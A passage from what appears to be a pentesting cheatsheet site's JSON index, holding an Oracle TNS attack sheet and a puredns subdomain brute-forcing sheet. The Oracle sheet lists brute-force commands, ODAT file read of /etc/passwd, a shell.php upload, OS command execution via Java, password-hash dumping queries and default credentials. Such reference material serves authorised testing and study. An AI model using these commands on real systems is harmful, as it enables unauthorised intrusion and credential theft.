oracle-brute \\ --script-args oracle-brute.sid=\u0026lt;sid\u0026gt; \u0026lt;ip\u0026gt; Default Credentials Username Password Notes sys change_on_install sysdba system manager scott tiger Classic demo user dbsnmp dbsnmp SNMP agent mdsys mdsys hr hr ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/oracle-tns/","summary":"\u003ch1 id=\"oracle-tns-enumeration-cheatsheet\"\u003eOracle TNS Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 1521 (TCP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-tns-version \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-sid-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-brute-stealth \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-enum-users \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --script-args oracle-enum-users.sid\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;sid\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"odat-oracle-database-attacking-tool\"\u003eODAT (Oracle Database Attacking Tool)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Full automated scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat all -s \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# SID brute force\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat sidguesser -s \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Password brute force (after getting SID)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat passwordguesser -s \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e -d \u0026lt;sid\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# File read/write (requires UTL_FILE privilege)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat utlfile -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --getFile /etc/passwd /tmp/passwd.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat utlfile -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --putFile /tmp shell.php shell.php\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# OS command execution (requires Java)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat java -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --exec \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;whoami\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# External table method for file read\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eodat externaltable -s \u0026lt;ip\u0026gt; -d \u0026lt;sid\u0026gt; -U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt; --getFile /etc/passwd\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"sqlplus-direct-connection\"\u003esqlplus (Direct Connection)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Install: sudo apt install oracle-instantclient-sqlplus\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;sid\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;sid\u0026gt; as sysdba\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esqlplus \u0026lt;user\u0026gt;/\u0026lt;pass\u0026gt;@//\u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;/\u0026lt;service_name\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-sids-to-try\"\u003eCommon SIDs to Try\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eXE ORCL DB DATABASE\nPROD TEST DEV ORACLE\nOEMREP ORACLR_CONNECTION_DATA\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"enumeration-queries-once-connected\"\u003eEnumeration Queries (Once Connected)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Version and user\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e v$version;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e dual;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e session_privs;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Database objects\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e all_tables;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eowner\u003c/span\u003e, \u003cspan style=\"color:#66d9ef\"\u003etable_name\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e all_tables \u003cspan style=\"color:#66d9ef\"\u003eWHERE\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eowner\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e!=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SYS\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003ecolumn_name\u003c/span\u003e, data_type \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e all_tab_columns \u003cspan style=\"color:#66d9ef\"\u003eWHERE\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003etable_name\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;TABLE\u0026gt;\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Users and privileges\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e username \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e dba_users;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e user_role_privs;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e dba_sys_privs \u003cspan style=\"color:#66d9ef\"\u003eWHERE\u003c/span\u003e grantee \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;user\u0026gt;\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Password hashes (as SYSDBA)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e name, password \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e sys.\u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e\u003cspan style=\"color:#960050;background-color:#1e0010\"\u003e$\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e name, spare4 \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e sys.\u003cspan style=\"color:#66d9ef\"\u003euser\u003c/span\u003e\u003cspan style=\"color:#960050;background-color:#1e0010\"\u003e$\u003c/span\u003e; \u003cspan style=\"color:#75715e\"\u003e-- SHA-1 hashes (11g+)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Check for DBA role\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e \u003cspan style=\"color:#f92672\"\u003e*\u003c/span\u003e \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e session_privs \u003cspan style=\"color:#66d9ef\"\u003eWHERE\u003c/span\u003e privilege \u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;CREATE SESSION\u0026#39;\u003c/span\u003e;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"privilege-escalation-via-java\"\u003ePrivilege Escalation via Java\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-sql\" data-lang=\"sql\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Grant Java permissions (as DBA)\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e dbms_java.grant_permission(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SCOTT\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SYS:java.io.FilePermission\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026lt;\u0026lt;ALL FILES\u0026gt;\u0026gt;\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;execute\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e dbms_java.grant_permission(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SCOTT\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SYS:java.lang.RuntimePermission\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;writeFileDescriptor\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eEXEC\u003c/span\u003e dbms_java.grant_permission(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SCOTT\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;SYS:java.lang.RuntimePermission\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;readFileDescriptor\u0026#39;\u003c/span\u003e, \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;\u0026#39;\u003c/span\u003e);\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e-- Execute OS command via Java\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003eSELECT\u003c/span\u003e dbms_java.runjava(\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;oracle/aurora/util/Wrapper /bin/bash -c \u0026#34;id \u0026gt; /tmp/out\u0026#34;\u0026#39;\u003c/span\u003e) \u003cspan style=\"color:#66d9ef\"\u003eFROM\u003c/span\u003e dual;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e oracle://\u0026lt;ip\u0026gt;/\u0026lt;sid\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e1521\u003c/span\u003e --script oracle-brute \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --script-args oracle-brute.sid\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;sid\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"default-credentials\"\u003eDefault Credentials\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eUsername\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003ePassword\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eNotes\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003esys\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003echange_on_install\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003esysdba\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003esystem\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003emanager\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003escott\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003etiger\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eClassic demo user\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003edbsnmp\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003edbsnmp\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSNMP agent\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003emdsys\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003emdsys\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003ehr\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ehr\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e","title":"Oracle TNS"},{"content":"puredns Cheatsheet Type: Powerful DNS brute-forcing and resolution tool — filters wildcard results effectively at scale\nInstallation go install github.com/d3mondev/puredns/v2@latest # Binary ends up in ~/go/bin/puredns # Also requires massdns (dependency for fast resolution) git clone https://github.com/blechschmidt/massdns.git cd massdns \u0026amp;\u0026amp; make sudo cp bin/massdns /usr/local/bin/ Modes Mode Description bruteforce Brute force subdomains using a wordlist resolve Resolve a list of domains/subdomains Basic Usage # Brute force puredns bruteforce wordlist.txt example.com # Resolve a list of subdomains puredns resolve subdomains.txt Common Flags Flag Description -r \u0026lt;file\u0026gt; Resolver list file (required for speed) --resolvers-trusted \u0026lt;file\u0026gt; Trusted resolvers for wildcard detection -l \u0026lt;n\u0026gt; Rate limit (queries per second) --bin \u0026lt;path\u0026gt; Path to massdns binary -w \u0026lt;file\u0026gt; Write valid results to file --wildcard-tests \u0026lt;n\u0026gt; Number of wildcard tests per domain (default: 10) --wildcard-batch \u0026lt;n\u0026gt; Subdomains to test per batch --skip-wildcard-filter Skip wildcard filtering --skip-validation Skip validation step -t \u0026lt;n\u0026gt; Massdns threads -q Quiet mode -v Verbose Common Commands # Basic brute force with resolver list puredns bruteforce wordlist.txt example.com -r resolvers.txt # Brute force with rate limiting puredns bruteforce wordlist.txt example.com \\ -r resolvers.txt \\ -l 1000 # Brute force with trusted resolvers for wildcard detection puredns bruteforce wordlist.txt example.com \\ -r resolvers.txt \\ --resolvers-trusted trusted.txt # Save results to file puredns bruteforce wordlist.txt example.com \\ -r resolvers.txt \\ -w results.txt # Resolve a list of subdomains puredns resolve subdomains.txt -r resolvers.txt # Resolve and save valid results puredns resolve subdomains.txt -r resolvers.txt -w resolved.txt # Skip wildcard filter (if you want all results) puredns bruteforce wordlist.txt example.com \\ -r resolvers.txt \\ --skip-wildcard-filter # Quiet output (subdomains only to stdout) puredns bruteforce wordlist.txt example.com -r resolvers.txt -q Resolver Lists Public resolver lists are essential for speed and accuracy:\n# Download fresh public resolvers wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt # Trusted resolvers (for wildcard detection — use well-known ones) cat trusted.txt # 8.8.8.8 # 8.8.4.4 # 1.1.1.1 # 1.0.0.1 # 9.9.9.9 Recommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt # Large wordlists — puredns handles them efficiently https://github.com/danielmiessler/SecLists https://github.com/trickest/wordlists # DNS-specific massive lists Pipeline Examples # Combine assetfinder results + puredns brute force assetfinder --subs-only example.com \u0026gt; passive.txt puredns bruteforce wordlist.txt example.com \\ -r resolvers.txt -w brute.txt cat passive.txt brute.txt | sort -u \u0026gt; all_subs.txt # Resolve large subdomain list from other tools amass enum -passive -d example.com | \\ puredns resolve - -r resolvers.txt -w resolved.txt # Full pipeline puredns bruteforce \\ /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ example.com \\ -r resolvers.txt \\ --resolvers-trusted trusted.txt \\ -l 500 \\ -w valid_subs.txt \\ -q Wildcard Handling puredns detects and filters wildcard DNS responses automatically. If *.example.com resolves to the same IP, it identifies the pattern and removes false positives from results — much more reliable than tools that ignore wildcard records.\nUse --resolvers-trusted with well-known public resolvers (e.g. 8.8.8.8, 1.1.1.1) specifically for wildcard detection to avoid poisoned/untrustworthy public resolver results.\n","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/dns-and-subdomains/puredns/","summary":"\u003ch1 id=\"puredns-cheatsheet\"\u003epuredns Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eType:\u003c/strong\u003e Powerful DNS brute-forcing and resolution tool — filters wildcard results effectively at scale\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ego install github.com/d3mondev/puredns/v2@latest\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Binary ends up in ~/go/bin/puredns\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Also requires massdns (dependency for fast resolution)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003egit clone https://github.com/blechschmidt/massdns.git\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecd massdns \u003cspan style=\"color:#f92672\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e make\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo cp bin/massdns /usr/local/bin/\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"modes\"\u003eModes\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eMode\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ebruteforce\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBrute force subdomains using a wordlist\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eresolve\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eResolve a list of domains/subdomains\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan 